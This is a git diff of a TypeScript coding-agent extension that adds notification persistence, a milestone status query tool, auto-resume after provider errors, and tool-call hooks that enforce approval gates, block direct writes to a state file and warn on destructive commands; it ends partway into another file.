diff --git a/src/resources/extensions/gsd/bootstrap/notify-interceptor.ts b/src/resources/extensions/gsd/bootstrap/notify-interceptor.ts
new file mode 100644
index 000000000..2ac10cef3
--- /dev/null
+++ b/src/resources/extensions/gsd/bootstrap/notify-interceptor.ts
@@ -0,0 +1,34 @@
+// GSD Extension — Notify Interceptor
+// Wraps ctx.ui.notify() in-place to persist every notification through the
+// notification store. Uses a WeakSet to prevent double-wrapping and handle
+// UI context replacement on /reload gracefully.
+
+import type { ExtensionContext } from "@gsd/pi-coding-agent";
+
+import { appendNotification, type NotifySeverity } from "../notification-store.js";
+
+// Track which ui context objects have been wrapped to prevent double-install.
+// WeakSet allows GC to collect replaced uiContext instances after /reload.
+const _wrappedContexts = new WeakSet<object>();
+
+/**
+ * Install the notify interceptor on a context's UI object.
+ * Mutates ctx.ui.notify in place — the original is called after persistence.
+ * Safe to call multiple times; no-ops if already installed on the same ui object.
+ */
+export function installNotifyInterceptor(ctx: ExtensionContext): void {
+  if (_wrappedContexts.has(ctx.ui)) return;
+
+  const originalNotify = ctx.ui.notify.bind(ctx.ui);
+
+  (ctx.ui as any).notify = (message: string, type?: "info" | "warning" | "error" | "success"): void => {
+    try {
+      appendNotification(message, (type ?? "info") as NotifySeverity, "notify");
+    } catch {
+      // Non-fatal — never let persistence break the UI
+    }
+    originalNotify(message, type);
+  };
+
+  _wrappedContexts.add(ctx.ui);
+}
diff --git a/src/resources/extensions/gsd/bootstrap/provider-error-resume.ts b/src/resources/extensions/gsd/bootstrap/provider-error-resume.ts
new file mode 100644
index 000000000..d5f01f96d
--- /dev/null
+++ b/src/resources/extensions/gsd/bootstrap/provider-error-resume.ts
@@ -0,0 +1,59 @@
+import type {
+  ExtensionAPI,
+  ExtensionCommandContext,
+  ExtensionContext,
+} from "@gsd/pi-coding-agent";
+
+import { getAutoDashboardData, startAuto, type AutoDashboardData } from "../auto.js";
+import { resetTransientRetryState } from "./agent-end-recovery.js";
+
+type AutoResumeSnapshot = Pick<AutoDashboardData, "active" | "paused" | "stepMode" | "basePath">;
+
+export interface ProviderErrorResumeDeps {
+  getSnapshot(): AutoResumeSnapshot;
+  startAuto(
+    ctx: ExtensionCommandContext,
+    pi: ExtensionAPI,
+    base: string,
+    verboseMode: boolean,
+    options?: { step?: boolean },
+  ): Promise<void>;
+}
+
+const defaultDeps: ProviderErrorResumeDeps = {
+  getSnapshot: () => getAutoDashboardData(),
+  startAuto,
+};
+
+export async function resumeAutoAfterProviderDelay(
+  pi: ExtensionAPI,
+  ctx: ExtensionContext,
+  deps: ProviderErrorResumeDeps = defaultDeps,
+): Promise<"resumed" | "already-active" | "not-paused" | "missing-base"> {
+  const snapshot = deps.getSnapshot();
+
+  if (snapshot.active) return "already-active";
+  if (!snapshot.paused) return "not-paused";
+
+  if (!snapshot.basePath) {
+    ctx.ui.notify(
+      "Provider error recovery delay elapsed, but no paused auto-mode base path was available. Leaving auto-mode paused.",
+      "warning",
+    );
+    return "missing-base";
+  }
+
+  // Reset the transient retry counter before restarting — without this,
+  // consecutiveTransientCount accumulates across pause/resume cycles and
+  // permanently locks out auto-resume after MAX_TRANSIENT_AUTO_RESUMES errors.
+  resetTransientRetryState();
+
+  await deps.startAuto(
+    ctx as ExtensionCommandContext,
+    pi,
+    snapshot.basePath,
+    false,
+    { step: snapshot.stepMode },
+  );
+  return "resumed";
+}
diff --git a/src/resources/extensions/gsd/bootstrap/query-tools.ts b/src/resources/extensions/gsd/bootstrap/query-tools.ts
new file mode 100644
index 000000000..30ecefecf
--- /dev/null
+++ b/src/resources/extensions/gsd/bootstrap/query-tools.ts
@@ -0,0 +1,99 @@
+// GSD2 — Read-only query tools exposing DB state to the LLM via the WAL connection
+
+import { Type } from "@sinclair/typebox";
+import type { ExtensionAPI } from "@gsd/pi-coding-agent";
+
+import { logWarning } from "../workflow-logger.js";
+
+export function registerQueryTools(pi: ExtensionAPI): void {
+  pi.registerTool({
+    name: "gsd_milestone_status",
+    label: "Milestone Status",
+    description:
+      "Read the current status of a milestone and all its slices from the GSD database. " +
+      "Returns milestone metadata, per-slice status, and task counts per slice. " +
+      "Use this instead of querying .gsd/gsd.db directly via sqlite3 or better-sqlite3.",
+    promptSnippet: "Get milestone status, slice statuses, and task counts for a given milestoneId",
+    promptGuidelines: [
+      "Use this tool — not sqlite3 or better-sqlite3 — to inspect milestone or slice state from the DB.",
+    ],
+    parameters: Type.Object({
+      milestoneId: Type.String({ description: "Milestone ID to query (e.g. M001)" }),
+    }),
+    async execute(_toolCallId, params, _signal, _onUpdate, _ctx) {
+      try {
+        // Open the DB if not already open — safe for read-only use since
+        // ensureDbOpen() only creates/migrates when .gsd/ has content (#3644).
+        const { ensureDbOpen } = await import("./dynamic-tools.js");
+        const dbAvailable = await ensureDbOpen();
+        const {
+          getMilestone,
+          getSliceStatusSummary,
+          getSliceTaskCounts,
+          _getAdapter,
+        } = await import("../gsd-db.js");
+
+        if (!dbAvailable) {
+          return {
+            content: [{ type: "text" as const, text: "Error: GSD database is not available." }],
+            details: { operation: "milestone_status", error: "db_unavailable" } as any,
+          };
+        }
+
+        // Wrap all reads in a single transaction for snapshot consistency.
+        // SQLite WAL mode guarantees reads within a transaction see a single
+        // consistent snapshot, preventing torn reads from concurrent writes.
+        const adapter = _getAdapter()!;
+        adapter.exec("BEGIN");  // eslint-disable-line -- SQLite exec, not child_process
+        try {
+          const milestone = getMilestone(params.milestoneId);
+          if (!milestone) {
+            adapter.exec("COMMIT");  // eslint-disable-line
+            return {
+              content: [{ type: "text" as const, text: `Milestone ${params.milestoneId} not found in database.` }],
+              details: { operation: "milestone_status", milestoneId: params.milestoneId, found: false } as any,
+            };
+          }
+
+          const sliceStatuses = getSliceStatusSummary(params.milestoneId);
+
+          const slices = sliceStatuses.map((s) => {
+            const counts = getSliceTaskCounts(params.milestoneId, s.id);
+            return {
+              id: s.id,
+              status: s.status,
+              taskCounts: counts,
+            };
+          });
+
+          adapter.exec("COMMIT");  // eslint-disable-line
+
+          const result = {
+            milestoneId: milestone.id,
+            title: milestone.title,
+            status: milestone.status,
+            createdAt: milestone.created_at,
+            completedAt: milestone.completed_at,
+            sliceCount: slices.length,
+            slices,
+          };
+
+          return {
+            content: [{ type: "text" as const, text: JSON.stringify(result, null, 2) }],
+            details: { operation: "milestone_status", milestoneId: milestone.id, sliceCount: slices.length } as any,
+          };
+        } catch (txErr) {
+          try { adapter.exec("ROLLBACK"); } catch { /* swallow */ }  // eslint-disable-line
+          throw txErr;
+        }
+      } catch (err) {
+        const msg = err instanceof Error ? err.message : String(err);
+        logWarning("tool", `gsd_milestone_status tool failed: ${msg}`);
+        return {
+          content: [{ type: "text" as const, text: `Error querying milestone status: ${msg}` }],
+          details: { operation: "milestone_status", error: msg } as any,
+        };
+      }
+    },
+  });
+}
diff --git a/src/resources/extensions/gsd/bootstrap/register-extension.ts b/src/resources/extensions/gsd/bootstrap/register-extension.ts
index 166d227ad..024d4a72d 100644
--- a/src/resources/extensions/gsd/bootstrap/register-extension.ts
+++ b/src/resources/extensions/gsd/bootstrap/register-extension.ts
@@ -1,3 +1,5 @@
+// GSD2 — Extension registration: wires all GSD tools, commands, and hooks into pi
+
 import type { ExtensionAPI, ExtensionCommandContext } from "@gsd/pi-coding-agent";
 
 import { registerGSDCommand } from "../commands.js";
@@ -6,20 +8,38 @@ import { registerWorktreeCommand } from "../worktree-command.js";
 import { registerDbTools } from "./db-tools.js";
 import { registerDynamicTools } from "./dynamic-tools.js";
 import { registerJournalTools } from "./journal-tools.js";
+import { registerQueryTools } from "./query-tools.js";
 import { registerHooks } from "./register-hooks.js";
 import { registerShortcuts } from "./register-shortcuts.js";
 
+export function handleRecoverableExtensionProcessError(err: Error): boolean {
+  if ((err as NodeJS.ErrnoException).code === "EPIPE") {
+    process.exit(0);
+  }
+  if ((err as NodeJS.ErrnoException).code === "ENOENT") {
+    const syscall = (err as NodeJS.ErrnoException).syscall;
+    if (syscall?.startsWith("spawn")) {
+      process.stderr.write(`[gsd] spawn ENOENT: ${(err as any).path ?? "unknown"} — command not found\n`);
+      return true;
+    }
+    if (syscall === "uv_cwd") {
+      process.stderr.write(`[gsd] ENOENT (${syscall}): ${err.message}\n`);
+      return true;
+    }
+  }
+  return false;
+}
+
 function installEpipeGuard(): void {
   if (!process.listeners("uncaughtException").some((listener) => listener.name === "_gsdEpipeGuard")) {
     const _gsdEpipeGuard = (err: Error): void => {
-      if ((err as NodeJS.ErrnoException).code === "EPIPE") {
-        process.exit(0);
-      }
-      if ((err as NodeJS.ErrnoException).code === "ENOENT" && (err as any).syscall?.startsWith("spawn")) {
-        process.stderr.write(`[gsd] spawn ENOENT: ${(err as any).path ?? "unknown"} — command not found\n`);
+      if (handleRecoverableExtensionProcessError(err)) {
         return;
       }
-      throw err;
+      // Log unhandled errors instead of re-throwing — throwing inside an
+      // uncaughtException handler is a fatal double-fault in Node.js (#3163).
+      process.stderr.write(`[gsd] uncaught extension error (non-fatal): ${err.message}\n`);
+      if (err.stack) process.stderr.write(`${err.stack}\n`);
     };
     process.on("uncaughtException", _gsdEpipeGuard);
   }
@@ -42,7 +62,7 @@ export function registerGsdExtension(pi: ExtensionAPI): void {
   registerDynamicTools(pi);
   registerDbTools(pi);
   registerJournalTools(pi);
+  registerQueryTools(pi);
   registerShortcuts(pi);
   registerHooks(pi);
 }
-
diff --git a/src/resources/extensions/gsd/bootstrap/register-hooks.ts b/src/resources/extensions/gsd/bootstrap/register-hooks.ts
index 1ff2452f9..4bb105f71 100644
--- a/src/resources/extensions/gsd/bootstrap/register-hooks.ts
+++ b/src/resources/extensions/gsd/bootstrap/register-hooks.ts
@@ -6,53 +6,86 @@ import { isToolCallEventType } from "@gsd/pi-coding-agent";
 import { buildMilestoneFileName, resolveMilestonePath, resolveSliceFile, resolveSlicePath } from "../paths.js";
 import { buildBeforeAgentStartResult } from "./system-context.js";
 import { handleAgentEnd } from "./agent-end-recovery.js";
-import { clearDiscussionFlowState, isDepthVerified, isQueuePhaseActive, markDepthVerified, resetWriteGateState, shouldBlockContextWrite } from "./write-gate.js";
+import { clearDiscussionFlowState, isDepthConfirmationAnswer, isQueuePhaseActive, markDepthVerified, resetWriteGateState, shouldBlockContextWrite, shouldBlockQueueExecution, isGateQuestionId, setPendingGate, clearPendingGate, getPendingGate, shouldBlockPendingGate, shouldBlockPendingGateBash, extractDepthVerificationMilestoneId } from "./write-gate.js";
+import { isBlockedStateFile, isBashWriteToStateFile, BLOCKED_WRITE_ERROR } from "../write-intercept.js";
+import { cleanupQuickBranch } from "../quick.js";
 import { getDiscussionMilestoneId } from "../guided-flow.js";
 import { loadToolApiKeys } from "../commands-config.js";
 import { loadFile, saveFile, formatContinue } from "../files.js";
 import { deriveState } from "../state.js";
-import { getAutoDashboardData, isAutoActive, isAutoPaused, markToolEnd, markToolStart } from "../auto.js";
+import { getAutoDashboardData, isAutoActive, isAutoPaused, markToolEnd, markToolStart, recordToolInvocationError } from "../auto.js";
 import { isParallelActive, shutdownParallel } from "../parallel-orchestrator.js";
 import { checkToolCallLoop, resetToolCallLoopGuard } from "./tool-call-loop-guard.js";
 import { saveActivityLog } from "../activity-log.js";
+import { resetAskUserQuestionsCache } from "../../ask-user-questions.js";
+import { recordToolCall as safetyRecordToolCall, recordToolResult as safetyRecordToolResult } from "../safety/evidence-collector.js";
+import { classifyCommand } from "../safety/destructive-guard.js";
+import { logWarning as safetyLogWarning } from "../workflow-logger.js";
+import { installNotifyInterceptor } from "./notify-interceptor.js";
+import { initNotificationStore } from "../notification-store.js";
+import { initNotificationWidget } from "../notification-widget.js";
+import { initHealthWidget } from "../health-widget.js";
 
 // Skip the welcome screen on the very first session_start — cli.ts already
 // printed it before the TUI launched. Only re-print on /clear (subsequent sessions).
 let isFirstSession = true;
 
+async function syncServiceTierStatus(ctx: ExtensionContext): Promise<void> {
+  const { getEffectiveServiceTier, formatServiceTierFooterStatus } = await import("../service-tier.js");
+  ctx.ui.setStatus("gsd-fast", formatServiceTierFooterStatus(getEffectiveServiceTier(), ctx.model?.id));
+}
+
 export function registerHooks(pi: ExtensionAPI): void {
   pi.on("session_start", async (_event, ctx) => {
+    initNotificationStore(process.cwd());
+    installNotifyInterceptor(ctx);
+    initNotificationWidget(ctx);
+    initHealthWidget(ctx);
     resetWriteGateState();
     resetToolCallLoopGuard();
+    resetAskUserQuestionsCache();
+    await syncServiceTierStatus(ctx);
+
+    // Apply show_token_cost preference (#1515)
+    try {
+      const { loadEffectiveGSDPreferences } = await import("../preferences.js");
+      const prefs = loadEffectiveGSDPreferences();
+      process.env.GSD_SHOW_TOKEN_COST = prefs?.preferences.show_token_cost ? "1" : "";
+    } catch { /* non-fatal */ }
     if (isFirstSession) {
       isFirstSession = false;
     } else {
       try {
         const gsdBinPath = process.env.GSD_BIN_PATH;
         if (gsdBinPath) {
-          const { dirname } = await import('node:path');
+          const { dirname } = await import("node:path");
           const { printWelcomeScreen } = await import(
-            join(dirname(gsdBinPath), 'welcome-screen.js')
-          ) as { printWelcomeScreen: (opts: { version: string; modelName?: string; provider?: string }) => void };
-          printWelcomeScreen({ version: process.env.GSD_VERSION || '0.0.0' });
+            join(dirname(gsdBinPath), "welcome-screen.js")
+          ) as { printWelcomeScreen: (opts: { version: string; modelName?: string; provider?: string; remoteChannel?: string }) => void };
+
+          let remoteChannel: string | undefined;
+          try {
+            const { resolveRemoteConfig } = await import("../../remote-questions/config.js");
+            const rc = resolveRemoteConfig();
+            if (rc) remoteChannel = rc.channel;
+          } catch { /* non-fatal */ }
+
+          printWelcomeScreen({ version: process.env.GSD_VERSION || "0.0.0", remoteChannel });
         }
       } catch { /* non-fatal */ }
     }
     loadToolApiKeys();
-    try {
-      const [{ getRemoteConfigStatus }, { getLatestPromptSummary }] = await Promise.all([
-        import("../../remote-questions/config.js"),
-        import("../../remote-questions/status.js"),
-      ]);
-      const status = getRemoteConfigStatus();
-      const latest = getLatestPromptSummary();
-      if (!status.includes("not configured")) {
-        const suffix = latest ? `\nLast remote prompt: ${latest.id} (${latest.status})` : "";
-        ctx.ui.notify(`${status}${suffix}`, status.includes("disabled") ? "warning" : "info");
-      }
-    } catch {
-      // ignore
-    }
+  });
+
+  pi.on("session_switch", async (_event, ctx) => {
+    initNotificationStore(process.cwd());
+    installNotifyInterceptor(ctx);
+    resetWriteGateState();
+    resetToolCallLoopGuard();
+    resetAskUserQuestionsCache();
+    clearDiscussionFlowState();
+    await syncServiceTierStatus(ctx);
+    loadToolApiKeys();
   });
 
   pi.on("before_agent_start", async (event, ctx: ExtensionContext) => {
@@ -61,11 +94,26 @@ export function registerHooks(pi: ExtensionAPI): void {
 
   pi.on("agent_end", async (event, ctx: ExtensionContext) => {
     resetToolCallLoopGuard();
+    resetAskUserQuestionsCache();
     await handleAgentEnd(pi, event, ctx);
   });
 
+  // Squash-merge quick-task branch back to the original branch after the
+  // agent turn completes (#2668). cleanupQuickBranch is a no-op when no
+  // quick-return state is pending, so this is safe to call on every turn.
+  pi.on("turn_end", async () => {
+    try {
+      cleanupQuickBranch();
+    } catch {
+      // Best-effort: don't break the turn lifecycle if cleanup fails.
+    }
+  });
+
   pi.on("session_before_compact", async () => {
-    if (isAutoActive() || isAutoPaused()) {
+    // Only cancel compaction while auto-mode is actively running.
+    // Paused auto-mode should allow compaction — the user may be doing
+    // interactive work (#3165).
+    if (isAutoActive()) {
       return { cancel: true };
     }
     const basePath = process.cwd();
@@ -116,36 +164,158 @@ export function registerHooks(pi: ExtensionAPI): void {
   });
 
   pi.on("tool_call", async (event) => {
+    const discussionBasePath = process.cwd();
     // ── Loop guard: block repeated identical tool calls ──
     const loopCheck = checkToolCallLoop(event.toolName, event.input as Record<string, unknown>);
     if (loopCheck.block) {
       return { block: true, reason: loopCheck.reason };
     }
 
+    // ── Discussion gate enforcement: track pending gate questions ─────────
+    // Only gate-shaped ask_user_questions calls should block execution.
+    // The gate stays pending until the user selects the approval option.
+    if (event.toolName === "ask_user_questions") {
+      const milestoneId = getDiscussionMilestoneId(discussionBasePath);
+      const inDiscussion = milestoneId !== null || isQueuePhaseActive();
+      if (inDiscussion) {
+        const questions: any[] = (event.input as any)?.questions ?? [];
+        const questionId = questions.find((question) => typeof question?.id === "string" && isGateQuestionId(question.id))?.id;
+        if (typeof questionId === "string") {
+          setPendingGate(questionId);
+        }
+      }
+    }
+
+    // ── Discussion gate enforcement: block tool calls while gate is pending ──
+    // If ask_user_questions was called with a gate ID but hasn't been confirmed,
+    // block all non-read-only tool calls to prevent the model from skipping gates.
+    if (getPendingGate()) {
+      const milestoneId = getDiscussionMilestoneId(discussionBasePath);
+      if (isToolCallEventType("bash", event)) {
+        const bashGuard = shouldBlockPendingGateBash(
+          event.input.command,
+          milestoneId,
+          isQueuePhaseActive(),
+        );
+        if (bashGuard.block) return bashGuard;
+      } else {
+        const gateGuard = shouldBlockPendingGate(
+          event.toolName,
+          milestoneId,
+          isQueuePhaseActive(),
+        );
+        if (gateGuard.block) return gateGuard;
+      }
+    }
+
+    // ── Queue-mode execution guard (#2545): block source-code mutations ──
+    // When /gsd queue is active, the agent should only create milestones,
+    // not execute work. Block write/edit to non-.gsd/ paths and bash commands
+    // that would modify files.
+    if (isQueuePhaseActive()) {
+      let queueInput = "";
+      if (isToolCallEventType("write", event)) {
+        queueInput = event.input.path;
+      } else if (isToolCallEventType("edit", event)) {
+        queueInput = event.input.path;
+      } else if (isToolCallEventType("bash", event)) {
+        queueInput = event.input.command;
+      }
+      const queueGuard = shouldBlockQueueExecution(event.toolName, queueInput, true);
+      if (queueGuard.block) return queueGuard;
+    }
+
+    // ── Single-writer engine: block direct writes to STATE.md ──────────
+    // Covers write, edit, and bash tools to prevent bypass vectors.
+    if (isToolCallEventType("write", event)) {
+      if (isBlockedStateFile(event.input.path)) {
+        return { block: true, reason: BLOCKED_WRITE_ERROR };
+      }
+    }
+
+    if (isToolCallEventType("edit", event)) {
+      if (isBlockedStateFile(event.input.path)) {
+        return { block: true, reason: BLOCKED_WRITE_ERROR };
+      }
+    }
+
+    if (isToolCallEventType("bash", event)) {
+      if (isBashWriteToStateFile(event.input.command)) {
+        return { block: true, reason: BLOCKED_WRITE_ERROR };
+      }
+    }
+
     if (!isToolCallEventType("write", event)) return;
+
     const result = shouldBlockContextWrite(
       event.toolName,
       event.input.path,
-      getDiscussionMilestoneId(),
-      isDepthVerified(),
+      getDiscussionMilestoneId(discussionBasePath),
       isQueuePhaseActive(),
     );
     if (result.block) return result;
   });
 
+  // ── Safety harness: evidence collection + destructive command warnings ──
+  pi.on("tool_call", async (event, ctx) => {
+    if (!isAutoActive()) return;
+    safetyRecordToolCall(event.toolName, event.input as Record<string, unknown>);
+
+    // Destructive command classification (warn only, never block)
+    if (isToolCallEventType("bash", event)) {
+      const classification = classifyCommand(event.input.command);
+      if (classification.destructive) {
+        safetyLogWarning("safety", `destructive command: ${classification.labels.join(", ")}`, {
+          command: String(event.input.command).slice(0, 200),
+        });
+        ctx.ui.notify(
+          `Destructive command detected: ${classification.labels.join(", ")}`,
+          "warning",
+        );
+      }
+    }
+  });
+
   pi.on("tool_result", async (event) => {
     if (event.toolName !== "ask_user_questions") return;
-    const milestoneId = getDiscussionMilestoneId();
+    const milestoneId = getDiscussionMilestoneId(process.cwd());
     const queueActive = isQueuePhaseActive();
     if (!milestoneId && !queueActive) return;
 
     const details = event.details as any;
+
+    // ── Discussion gate enforcement: handle gate question responses ──
+    // If the result is cancelled or has no response, the pending gate stays active
+    // so the model is blocked from non-read-only tools until it re-asks.
+    // If the user responded at all (even "needs adjustment"), clear the pending gate
+    // because the user engaged — the prompt handles the re-ask-after-adjustment flow.
+    const questions: any[] = (event.input as any)?.questions ?? [];
+    const currentPendingGate = getPendingGate();
+    if (currentPendingGate) {
+      if (details?.cancelled || !details?.response) {
+        // Gate stays pending — model will be blocked from non-read-only tools
+        // until it re-asks and gets a valid response
+      } else {
+        const pendingQuestion = questions.find((question) => question?.id === currentPendingGate);
+        if (pendingQuestion) {
+          const answer = details.response?.answers?.[currentPendingGate];
+          if (isDepthConfirmationAnswer(answer?.selected, pendingQuestion.options)) {
+            clearPendingGate();
+          }
+        }
+      }
+    }
+
     if (details?.cancelled || !details?.response) return;
 
-    const questions: any[] = (event.input as any)?.questions ?? [];
     for (const question of questions) {
       if (typeof question.id === "string" && question.id.includes("depth_verification")) {
-        markDepthVerified();
+        // Only unlock the gate if the user selected the first option (confirmation).
+        // Cross-references against the question's defined options to reject free-form "Other" text.
+        const answer = details.response?.answers?.[question.id];
+        if (isDepthConfirmationAnswer(answer?.selected, question.options)) {
+          markDepthVerified(extractDepthVerificationMilestoneId(question.id) ?? milestoneId);
+        }
         break;
       }
     }
@@ -190,19 +360,90 @@ export function registerHooks(pi: ExtensionAPI): void {
 
   pi.on("tool_execution_end", async (event) => {
     markToolEnd(event.toolCallId);
+    // #2883: Capture tool invocation errors (malformed/truncated JSON arguments)
+    // so postUnitPreVerification can break the retry loop instead of re-dispatching.
+    if (event.isError && event.toolName.startsWith("gsd_")) {
+      const errorText = typeof event.result === "string"
+        ? event.result
+        : (typeof event.result?.content?.[0]?.text === "string" ? event.result.content[0].text : String(event.result));
+      recordToolInvocationError(event.toolName, errorText);
+    }
+    // Safety harness: record tool execution results for evidence cross-referencing
+    if (isAutoActive()) {
+      safetyRecordToolResult(event.toolCallId, event.toolName, event.result, event.isError);
+    }
+  });
+
+  pi.on("model_select", async (_event, ctx) => {
+    await syncServiceTierStatus(ctx);
   });
 
   pi.on("before_provider_request", async (event) => {
-    if (!isAutoActive()) return;
-    const modelId = event.model?.id;
-    if (!modelId) return;
-    const { getEffectiveServiceTier, supportsServiceTier } = await import("../service-tier.js");
-    const tier = getEffectiveServiceTier();
-    if (!tier || !supportsServiceTier(modelId)) return;
     const payload = event.payload as Record<string, unknown> | null;
     if (!payload || typeof payload !== "object") return;
+
+    // ── Observation Masking ─────────────────────────────────────────────
+    // Replace old tool results with placeholders to reduce context bloat.
+    // Only active during auto-mode when context_management.observation_masking is enabled.
+    if (isAutoActive()) {
+      try {
+        const { loadEffectiveGSDPreferences } = await import("../preferences.js");
+        const prefs = loadEffectiveGSDPreferences();
+        const cmConfig = prefs?.preferences.context_management;
+
+        // Observation masking: replace old tool results with placeholders
+        if (cmConfig?.observation_masking !== false) {
+          const keepTurns = cmConfig?.observation_mask_turns ?? 8;
+          const { createObservationMask } = await import("../context-masker.js");
+          const mask = createObservationMask(keepTurns);
+          const messages = payload.messages;
+          if (Array.isArray(messages)) {
+            payload.messages = mask(messages);
+          }
+        }
+
+        // Tool result truncation: cap individual tool result content length.
+        // In pi-ai format, toolResult messages have role: "toolResult" and content: TextContent[].
+        // Creates new objects to avoid mutating shared conversation state.
+        const maxChars = cmConfig?.tool_result_max_chars ?? 800;
+        const msgs = payload.messages;
+        if (Array.isArray(msgs)) {
+          payload.messages = msgs.map((msg: Record<string, unknown>) => {
+            // Match toolResult messages (role: "toolResult", content is array of content blocks)
+            if (msg?.role === "toolResult" && Array.isArray(msg.content)) {
+              const blocks = msg.content as Array<Record<string, unknown>>;
+              const totalLen = blocks.reduce((sum: number, b) => sum + (typeof b.text === "string" ? b.text.length : 0), 0);
+              if (totalLen > maxChars) {
+                const truncated = blocks.map(b => {
+                  if (typeof b.text === "string" && b.text.length > maxChars) {
+                    return { ...b, text: b.text.slice(0, maxChars) + "\n…[truncated]" };
+                  }
+                  return b;
+                });
+                return { ...msg, content: truncated };
+              }
+            }
+            return msg;
+          });
+        }
+      } catch { /* non-fatal */ }
+    }
+
+    // ── Service Tier ────────────────────────────────────────────────────
+    const modelId = event.model?.id;
+    if (!modelId) return payload;
+    const { getEffectiveServiceTier, supportsServiceTier } = await import("../service-tier.js");
+    const tier = getEffectiveServiceTier();
+    if (!tier || !supportsServiceTier(modelId)) return payload;
     payload.service_tier = tier;
     return payload;
   });
-}
 
+  // Capability-aware model routing hook (ADR-004)
+  // Extensions can override model selection by returning { modelId: "..." }
+  // Return undefined to let the built-in capability scoring proceed.
+  pi.on("before_model_select", async (_event) => {
+    // Default: no override — let capability scoring handle selection
+    return undefined;
+  });
+}
diff --git a/src/resources/extensions/gsd/bootstrap/register-shortcuts.ts b/src/resources/extensions/gsd/bootstrap/register-shortcuts.ts
index ea94bc9dd..e3c947aff 100644
--- a/src/resources/extensions/gsd/bootstrap/register-shortcuts.ts
+++ b/src/resources/extensions/gsd/bootstrap/register-shortcuts.ts
@@ -5,18 +5,65 @@ import type { ExtensionAPI } from "@gsd/pi-coding-agent";
 import { Key } from "@gsd/pi-tui";
 
 import { GSDDashboardOverlay } from "../dashboard-overlay.js";
+import { GSDNotificationOverlay } from "../notification-overlay.js";
+import { ParallelMonitorOverlay } from "../parallel-monitor-overlay.js";
+import { projectRoot } from "../commands/context.js";
 import { shortcutDesc } from "../../shared/mod.js";
 
 export function registerShortcuts(pi: ExtensionAPI): void {
   pi.registerShortcut(Key.ctrlAlt("g"), {
     description: shortcutDesc("Open GSD dashboard", "/gsd status"),
     handler: async (ctx) => {
-      if (!existsSync(join(process.cwd(), ".gsd"))) {
+      const basePath = projectRoot();
+      if (!existsSync(join(basePath, ".gsd"))) {
         ctx.ui.notify("No .gsd/ directory found. Run /gsd to start.", "info");
         return;
       }
-      await ctx.ui.custom<void>(
-        (tui, theme, _kb, done) => new GSDDashboardOverlay(tui, theme, () => done()),
+      await ctx.ui.custom<boolean>(
+        (tui, theme, _kb, done) => new GSDDashboardOverlay(tui, theme, () => done(true)),
+        {
+          overlay: true,
+          overlayOptions: {
+            width: "90%",
+            minWidth: 80,
+            maxHeight: "92%",
+            anchor: "center",
+          },
+        },
+      );
+    },
+  });
+
+  pi.registerShortcut(Key.ctrlAlt("n"), {
+    description: shortcutDesc("Open notification history", "/gsd notifications"),
+    handler: async (ctx) => {
+      await ctx.ui.custom<boolean>(
+        (tui, theme, _kb, done) => new GSDNotificationOverlay(tui, theme, () => done(true)),
+        {
+          overlay: true,
+          overlayOptions: {
+            width: "80%",
+            minWidth: 60,
+            maxHeight: "88%",
+            anchor: "center",
+            backdrop: true,
+          },
+        },
+      );
+    },
+  });
+
+  pi.registerShortcut(Key.ctrlAlt("p"), {
+    description: shortcutDesc("Open parallel worker monitor", "/gsd parallel watch"),
+    handler: async (ctx) => {
+      const basePath = projectRoot();
+      const parallelDir = join(basePath, ".gsd", "parallel");
+      if (!existsSync(parallelDir)) {
+        ctx.ui.notify("No parallel workers found. Run /gsd parallel start first.", "info");
+        return;
+      }
+      await ctx.ui.custom<boolean>(
+        (tui, theme, _kb, done) => new ParallelMonitorOverlay(tui, theme, () => done(true)),
         {
           overlay: true,
           overlayOptions: {
diff --git a/src/resources/extensions/gsd/bootstrap/sanitize-complete-milestone.ts b/src/resources/extensions/gsd/bootstrap/sanitize-complete-milestone.ts
new file mode 100644
index 000000000..3c770095d
--- /dev/null
+++ b/src/resources/extensions/gsd/bootstrap/sanitize-complete-milestone.ts
@@ -0,0 +1,57 @@
+/**
+ * Input sanitization for gsd_complete_milestone parameters.
+ *
+ * The Claude SDK deserializes tool-call JSON before the handler runs.
+ * When an LLM (especially smaller models like haiku) generates large markdown
+ * parameters, the JSON can arrive with subtly wrong types — numbers where
+ * strings are expected, null where arrays belong, string "true" instead of
+ * boolean true, etc.  This sanitizer normalizes all fields so
+ * handleCompleteMilestone never crashes on type mismatches.
+ *
+ * See: https://github.com/gsd-build/gsd-2/issues/3013
+ */
+
+import type { CompleteMilestoneParams } from "../tools/complete-milestone.js";
+
+/**
+ * Coerce an unknown value to a trimmed string.
+ * Returns "" for null / undefined.
+ */
+function toStr(v: unknown): string {
+  if (v == null) return "";
+  return String(v).trim();
+}
+
+/**
+ * Coerce an unknown value to an array of trimmed, non-empty strings.
+ * - If already an array, filter/trim each element.
+ * - Otherwise return [].
+ */
+function toStrArray(v: unknown): string[] {
+  if (!Array.isArray(v)) return [];
+  return v
+    .map((item) => (item == null ? "" : String(item).trim()))
+    .filter((s) => s.length > 0);
+}
+
+/**
+ * Sanitize raw params from the tool-call framework into well-typed
+ * CompleteMilestoneParams, tolerating type mismatches from LLM JSON quirks.
+ */
+export function sanitizeCompleteMilestoneParams(raw: Record<string, unknown>): CompleteMilestoneParams {
+  return {
+    milestoneId: toStr(raw.milestoneId),
+    title: toStr(raw.title),
+    oneLiner: toStr(raw.oneLiner),
+    narrative: toStr(raw.narrative),
+    successCriteriaResults: toStr(raw.successCriteriaResults),
+    definitionOfDoneResults: toStr(raw.definitionOfDoneResults),
+    requirementOutcomes: toStr(raw.requirementOutcomes),
+    keyDecisions: toStrArray(raw.keyDecisions),
+    keyFiles: toStrArray(raw.keyFiles),
+    lessonsLearned: toStrArray(raw.lessonsLearned),
+    followUps: toStr(raw.followUps),
+    deviations: toStr(raw.deviations),
+    verificationPassed: raw.verificationPassed === true || raw.verificationPassed === "true",
+  };
+}
diff --git a/src/resources/extensions/gsd/bootstrap/system-context.ts b/src/resources/extensions/gsd/bootstrap/system-context.ts
index 6d4070d7f..744e57606 100644
--- a/src/resources/extensions/gsd/bootstrap/system-context.ts
+++ b/src/resources/extensions/gsd/bootstrap/system-context.ts
@@ -1,23 +1,52 @@
-import { existsSync, readFileSync } from "node:fs";
+import { existsSync, readFileSync, unlinkSync } from "node:fs";
 import { homedir } from "node:os";
 import { join } from "node:path";
 
 import type { ExtensionContext } from "@gsd/pi-coding-agent";
 
+import { logWarning } from "../workflow-logger.js";
 import { debugTime } from "../debug-logger.js";
-import { loadPrompt } from "../prompt-loader.js";
+import { loadPrompt, getTemplatesDir } from "../prompt-loader.js";
+import { readForensicsMarker } from "../forensics.js";
